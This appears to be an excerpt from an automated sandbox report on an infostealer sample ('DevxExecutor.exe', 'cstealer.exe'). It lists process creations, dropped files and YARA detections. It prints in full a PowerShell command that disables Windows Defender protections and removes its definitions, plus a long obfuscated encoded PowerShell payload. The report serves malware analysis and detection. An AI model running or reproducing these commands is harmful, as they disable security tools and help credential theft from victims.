                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

                                Language, Device and Operating System Detection

                                barindex
                                Yara detected Telegram Recon
                                Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC6536F0 cpuid 3_2_00000271DC6536F0
                                Source: C:\Users\user\Desktop\DevxExecutor.exeQueries volume information: C:\Users\user\Desktop\DevxExecutor.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\certifi VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_ctypes.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_bz2.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_lzma.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
